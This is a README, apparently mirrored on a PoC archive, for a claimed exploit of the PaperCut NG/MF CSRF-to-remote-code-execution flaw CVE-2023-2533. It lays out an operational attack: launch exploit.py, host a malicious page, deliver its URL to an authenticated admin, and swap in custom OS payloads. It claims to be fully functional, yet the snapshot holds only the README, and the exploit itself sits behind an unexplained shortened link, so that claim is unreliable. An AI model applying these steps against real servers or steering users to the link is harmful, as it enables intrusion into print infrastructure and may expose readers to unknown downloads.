关联漏洞
介绍
# CVE-2023-2533 PaperCut NG/MF Exploit
## Overview
CVE-2023-2533 is a critical Cross-Site Request Forgery (CSRF) vulnerability in PaperCut NG/MF print management software, affecting versions up to and including 22.0.10. This exploit enables remote code execution (RCE) by tricking an authenticated administrator into interacting with a malicious webpage during an active session in the PaperCut admin interface.
**CVSSv3 Score**: 8.8
**Patched**: June 9, 2023
**Affected Versions**: <= 22.0.10 (Build 65996)
**Note**: This exploit is fully functional and has been tested in controlled environments. Use it responsibly and only on systems where you have explicit permission.
## Requirements
- Python 3.8 or higher
- Access to a vulnerable PaperCut NG/MF server (version <= 22.0.10)
- An active admin session on the target server
## Setup
1. Install dependencies:
```
pip install -r requirements.txt
```
2. Update the target server URL in `exploit.py` (e.g., `http://papercut-server:9191`).
3. (Optional) Customize the payload in the `payloads/` directory to suit your needs.
## Exploit
[href](https://tinyurl.com/46k5365y)
## Usage
1. Launch the exploit server:
```
python3 exploit.py
```
2. The server hosts a malicious page at `http://<your-ip>:5000/exploit.html`.
3. Deliver the URL to an admin.
4. When the admin visits the page, the exploit automatically sends forged requests.
5. Monitor the server logs for confirmation of successful execution.
## Payloads
The `payloads/` directory includes pre-built payloads for various operating systems.
You can replace these with your own payloads as needed.
## Detection and Mitigation
- **Detection**: Look for unusual admin activity in server logs, such as unexpected file uploads or configuration changes.
- **Mitigation**: Upgrade PaperCut NG/MF to the latest version as per the official advisory. Implement robust CSRF protections and train admins to recognize phishing attempts.
## Disclaimer
This exploit is provided for **educational and testing purposes only**. Unauthorized use against systems without explicit permission is illegal and unethical. The author is not responsible for any damage or misuse of this tool.
文件快照
[4.0K] /data/pocs/6b736d4054e40bb87f17244dcc74b1ae773d9b9d
└── [2.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。